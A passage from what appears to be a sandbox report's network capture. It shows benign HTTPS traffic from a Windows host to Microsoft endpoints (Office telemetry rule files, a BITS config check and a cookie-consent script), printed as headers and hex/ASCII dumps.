                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC16384INData Raw: 76 5d 29 29 2c 65 5b 6c 76 5d 26 26 28 65 5b 6c 76 5d 3d 65 61 28 65 5b 6c 76 5d 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 74 29 7b 69 66 28 65 5b 79 76 5d 7c 7c 28 65 5b 79 76 5d 3d 30 29 2c 65 5b 43 76 5d 7c 7c 28 65 5b 43 76 5d 3d 31 29 2c 6c 28 65 29 2c 65 5b 62 76 5d 29 69 66 28 55 7c 7c 61 65 29 65 5b 43 76 5d 3d 33 2c 65 5b 62 76 5d 3d 21 31 3b 65 6c 73 65 20 69 66 28 48 29 72 65 74 75 72 6e 20 57 26 26 28 65 3d 65 61 28 65 29 29 2c 48 5b 72 76 5d 28 45 76 2e 63 72 65 61 74 65 28 65 5b 49 67 5d 2c 5b 65 5d 29 2c 21 30 3d 3d 3d 65 5b 62 76 5d 3f 31 3a 65 5b 62 76 5d 2c 33 29 3b 76 61 72 20 6e 3d 65 5b 43 76 5d 2c 72 3d 63 65 2c 69 3d 52 2c 61 3d 28 34 3d 3d 3d 6e 26 26 28 72 3d 6f 65 2c 69 3d 4f 29 2c 21 31 29 3b 72 3c 69 3f 61 3d 21 43 28
                                                                                                                                                                                                                            Data Ascii: v])),e[lv]&&(e[lv]=ea(e[lv])))}function a(e,t){if(e[yv]||(e[yv]=0),e[Cv]||(e[Cv]=1),l(e),e[bv])if(U||ae)e[Cv]=3,e[bv]=!1;else if(H)return W&&(e=ea(e)),H[rv](Ev.create(e[Ig],[e]),!0===e[bv]?1:e[bv],3);var n=e[Cv],r=ce,i=R,a=(4===n&&(r=oe,i=O),!1);r<i?a=!C(


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            63192.168.2.54979013.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:32 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 468
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                                            x-ms-request-id: 75885d68-101e-005a-2958-2e882b000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133932Z-17df447cdb5vq4m4hC1DFWrbp800000002p000000000fueh
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            64192.168.2.54979113.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:32 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 472
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                                            x-ms-request-id: 57b0571f-501e-00a3-7dfb-2cc0f2000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133932Z-16547b76f7f22sh5hC1DFWyb4w00000006gg00000000gcmg
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            65192.168.2.54978513.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:32 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 477
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                            x-ms-request-id: 6538f966-101e-00a2-58f1-2c9f2e000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133932Z-16547b76f7fxdzxghC1DFWmf7n00000006vg000000005cdr
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            66192.168.2.549794184.28.90.27443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC161OUTHEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            Accept-Encoding: identity
                                                                                                                                                                                                                            User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                            Host: fs.microsoft.com
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC467INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                            Content-Type: application/octet-stream
                                                                                                                                                                                                                            ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                            Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                            Server: ECAcc (chd/0790)
                                                                                                                                                                                                                            X-CID: 11
                                                                                                                                                                                                                            X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                            X-Ms-Region: prod-eus-z1
                                                                                                                                                                                                                            Cache-Control: public, max-age=149087
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:32 GMT
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            X-CID: 2


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            67192.168.2.54979513.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:32 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 485
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                                            x-ms-request-id: 9ba15ece-101e-0034-5d08-2c96ff000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133932Z-16547b76f7fmbrhqhC1DFWkds800000006pg00000000e8eq
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            68192.168.2.54979613.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:33 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 411
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                                            x-ms-request-id: 1572e0e4-b01e-003e-1a0c-2d8e41000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133933Z-16547b76f7fxdzxghC1DFWmf7n00000006s000000000cxy4
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                            69192.168.2.54979713.107.246.45443
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:32 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                                            Accept-Encoding: gzip
                                                                                                                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:33 GMT
                                                                                                                                                                                                                            Content-Type: text/xml
                                                                                                                                                                                                                            Content-Length: 470
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                            ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                                            x-ms-request-id: 4bc251d2-601e-00ab-3370-2e66f4000000
                                                                                                                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                                                                                                                            x-azure-ref: 20241106T133933Z-15869dbbcc6lq45jhC1DFW7zwg00000007800000000025m9
                                                                                                                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                            X-Cache: TCP_HIT
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                            70192.168.2.54979813.107.253.724433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC373OUTGET /mscc/lib/v2/wcp-consent.js HTTP/1.1
                                                                                                                                                                                                                            Host: wcpstatic.microsoft.com
                                                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                                                            Date: Wed, 06 Nov 2024 13:39:33 GMT
                                                                                                                                                                                                                            Content-Type: application/javascript
                                                                                                                                                                                                                            Content-Length: 52717
                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                                                            Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                                            Age: 15804
                                                                                                                                                                                                                            Cache-Control: max-age=43200
                                                                                                                                                                                                                            Content-MD5: QT/MdZzBmCG2G2lBgIsptQ==
                                                                                                                                                                                                                            Etag: 0x8DA85F6F74C6D08
                                                                                                                                                                                                                            Last-Modified: Wed, 24 Aug 2022 17:34:58 GMT
                                                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                                                            X-Cache: CONFIG_NOCACHE
                                                                                                                                                                                                                            x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                            x-ms-lease-status: unlocked
                                                                                                                                                                                                                            x-ms-request-id: f1255b38-901e-0056-632c-303130000000
                                                                                                                                                                                                                            x-ms-version: 2009-09-19
                                                                                                                                                                                                                            x-azure-ref: 20241106T133933Z-158dbd74bf42s6brhC1SN1tbnn00000005kg000000005x5k
                                                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC15671INData Raw: 76 61 72 20 57 63 70 43 6f 6e 73 65 6e 74 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3d 7b 32 32 39 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 77 69 6e 64 6f 77 2c 65 2e 65 78 70 6f 72 74 73 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6f 28 6e 29 7b 69 66 28 74 5b 6e 5d 29 72 65 74 75 72 6e 20 74 5b 6e 5d 2e 65 78 70 6f 72 74 73 3b 76 61 72 20 72 3d 74 5b 6e 5d 3d 7b 69 3a 6e 2c 6c 3a 21 31 2c 65 78 70 6f 72 74 73 3a 7b 7d 7d 3b 72 65 74 75 72 6e 20 65 5b 6e 5d 2e 63 61 6c 6c 28 72 2e 65 78 70 6f 72 74 73 2c 72 2c 72 2e 65 78 70 6f 72 74 73 2c 6f 29 2c 72 2e 6c 3d 21 30 2c 72 2e 65 78 70 6f 72 74 73 7d 72 65 74 75 72 6e 20 6f 2e 6d 3d 65 2c 6f 2e 63 3d 74 2c 6f 2e 64 3d 66 75 6e 63 74 69 6f 6e 28 65
                                                                                                                                                                                                                            Data Ascii: var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC16384INData Raw: 29 7b 72 65 74 75 72 6e 20 65 3f 65 2e 72 65 70 6c 61 63 65 28 2f 26 2f 67 2c 22 26 61 6d 70 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3c 2f 67 2c 22 26 6c 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 3e 2f 67 2c 22 26 67 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 22 2f 67 2c 22 26 71 75 6f 74 3b 22 29 2e 72 65 70 6c 61 63 65 28 2f 27 2f 67 2c 22 26 23 30 33 39 3b 22 29 3a 22 22 7d 2c 65 7d 28 29 2c 61 3d 6e 2e 6c 6f 63 61 6c 73 2c 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 65 28 65 2c 74 2c 6f 2c 6e 2c 72 2c 69 2c 61 29 7b 74 68 69 73 2e 64 69 72 65 63 74 69 6f 6e 3d 22 6c 74 72 22 2c 74 68 69 73 2e 70 72 65 76 69 6f 75 73 46 6f 63 75 73 45 6c 65 6d 65 6e 74 42 65 66 6f 72 65 50 6f 70 75 70 3d 6e 75 6c 6c 2c 74 68 69 73 2e 63 6f 6f 6b 69
                                                                                                                                                                                                                            Data Ascii: ){return e?e.replace(/&/g,"&amp;").replace(/</g,"&lt;").replace(/>/g,"&gt;").replace(/"/g,"&quot;").replace(/'/g,"&#039;"):""},e}(),a=n.locals,l=function(){function e(e,t,o,n,r,i,a){this.direction="ltr",this.previousFocusElementBeforePopup=null,this.cooki
                                                                                                                                                                                                                            2024-11-06 13:39:33 UTC711INData Raw: 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c 61 62 65 6c 3a 68 6f 76 65 72 3a 3a 61 66 74 65 72 20 7b 5c 6e 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 22 2b 65 5b 22 72 61 64 69 6f 2d 62 75 74 74 6f 6e 2d 68 6f 76 65 72 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 5d 2b 22 20 21 69 6d 70 6f 72 74 61 6e 74 3b 5c 6e 20 20 20 20 20 20 20 20 7d 22 2c 74 2b 3d 27 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 61 64 69 6f 22 5d 2e 27 2b 63 2e 63 6f 6f 6b 69 65 49 74 65 6d 52 61 64 69 6f 42 74 6e 2b 22 20 2b 20 6c
                                                                                                                                                                                                                            Data Ascii: or"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + label:hover::after {\n background-color: "+e["radio-button-hover-background-color"]+" !important;\n }",t+='input[type="radio"].'+c.cookieItemRadioBtn+" + l
